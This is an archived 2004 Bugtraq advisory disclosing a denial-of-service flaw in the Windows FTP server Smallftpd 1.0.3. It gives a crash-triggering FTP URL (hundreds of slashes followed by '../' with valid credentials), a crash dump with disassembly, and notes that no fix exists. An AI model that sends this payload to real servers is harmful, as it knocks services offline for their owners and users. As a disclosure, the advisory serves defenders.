lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 18 Feb 2004 06:41:19 +0800
From: "intuit e.b." <intuit@...uxmail.org>
To: bugtraq@...urityfocus.com
Subject: Smallftpd 1.0.3 DoS


Application:  Smallftpd 
              http://smallftpd.free.fr/

Version:      1.0.3

Bug:          Denial Of Service

Author:       intuit
              e-mail: intuit@...uxmail.org
              web: http://rootshells.tk/
              greetz to: tgs ;)))


***********************************************************************

1. Description
2. The bug
3. The code
4. The fix

***********************************************************************

^^^^^^^^^^^^^^^^
1. Description:
^^^^^^^^^^^^^^^^

Vendor's Description:

"Small ftpd is a small and simple muli-threaded ftp server for windows."


***********************************************************************

^^^^^^^^^^^^^^^^
2. The bug:
^^^^^^^^^^^^^^^^

Plural inquiries string like (usually 2(two) times suffice):
-----------------------------------------------------------------------

ftp://user:pass@....0.0.1/[464 and more "/" symbols]/../../../

-----------------------------------------------------------------------

crash a smallftpd.exe.
User:pass must be valid.


***********************************************************************

^^^^^^^^^^^^^^^^
3. The code:
^^^^^^^^^^^^^^^^

The mistake occurs here:

-----------------------------------------------------------------------
AppName: smallftpd.exe	 AppVer: 0.0.0.0	 ModName: user32.dll
ModVer: 5.1.2600.0	 Offset: 0000ca84
-----------------------------------------------------------------------

-----------------------------------------------------------------------
Registers:
  
 EAX=56534150 EBX=0000000A ECX=56534150 EDX=00000000 
 ESI=56534151 EDI=0136F8FA EIP=77D4CA84 ESP=0136F85C 
 EBP=0136F894 EFL=00000206 
 CS=001B DS=0023 ES=0023 SS=0023 
 FS = 0038 GS = 0000 OV=0 UP=0 EI=1 PL=0 ZR=0 AC=0 PE=1 CY=0

 56534150 = ??

Code(Win XP Build 2600, Service Pack: None):

77D4C9F6   mov         ecx,dword ptr [esp+8]
77D4C9FA   mov         eax,dword ptr [esp+4]
77D4C9FE   cmp         ecx,eax
77D4CA00   jbe         77D4CA12
77D4CA02   push        ebx
77D4CA03   mov         bl,byte ptr [ecx]
77D4CA05   mov         dl,byte ptr [eax]
77D4CA07   mov         byte ptr [eax],bl
77D4CA09   inc         eax
77D4CA0A   mov         byte ptr [ecx],dl
77D4CA0C   dec         ecx
77D4CA0D   cmp         ecx,eax
77D4CA0F   ja          77D4CA03
77D4CA11   pop         ebx
77D4CA12   ret         8
77D4CA15   sub         ecx,69h
77D4CA18   je          77D4C85C
77D4CA1E   sub         ecx,7
77D4CA21   je          77D77FAF
77D4CA27   sub         ecx,3
77D4CA2A   je          77D4CAF5
77D4CA30   dec         ecx
77D4CA31   dec         ecx
77D4CA32   je          77D4C863
77D4CA38   sub         ecx,3
77D4CA3B   jne         77D4C97D
77D4CA41   cmp         byte ptr [ebp+0Bh],0
77D4CA45   push        10h
77D4CA47   pop         ebx
77D4CA48   je          77D4C867
77D4CA4E   cmp         dword ptr [ebp-20h],0
77D4CA52   sete        al
77D4CA55   dec         al
77D4CA57   and         al,0E0h
77D4CA59   add         al,78h
77D4CA5B   mov         byte ptr [ebp+0Bh],al
77D4CA5E   jmp         77D4C867
77D4CA63   cmp         dword ptr [ebp-14h],eax
77D4CA66   jne         77D7ED06
77D4CA6C   mov         ecx,dword ptr [ebp-0Ch]
77D4CA6F   mov         ecx,dword ptr [ecx-4]
77D4CA72   mov         dword ptr [ebp-2Ch],ecx
77D4CA75   mov         dword ptr [ebp-28h],eax
77D4CA78   jmp         77D4C89D
77D4CA7D   add         ecx,esi
77D4CA7F   jmp         77D4C9D5
77D4CA84   mov         dl,byte ptr [eax]        <<< ftp server crashing here
77D4CA86   inc         eax
77D4CA87   test        dl,dl
77D4CA89   jne         77D4CA84
77D4CA8B   sub         eax,esi
77D4CA8D   xor         esi,esi
77D4CA8F   xor         edx,edx
77D4CA91   cmp         dword ptr [ebp-10h],edx
77D4CA94   jge         77D7A796
77D4CA9A   sub         dword ptr [ebp-8],eax
77D4CA9D   cmp         esi,edx
77D4CA9F   jne         77D6FF80


-----------------------------------------------------------------------

/*Tested on: Win XP Build 2600, Service Pack: None
             Win XP Build 2600, Service Pack: SP1  
             Win 98 Second Edition                 */
***********************************************************************

^^^^^^^^^^^^^^^^
4. The fix:
^^^^^^^^^^^^^^^^

Not exist.

***********************************************************************

-- 
______________________________________________
Check out the latest SMS services @ http://www.linuxmail.org 
This allows you to send and receive SMS through your mailbox.


Powered by Outblaze


Powered by blists - more mailing lists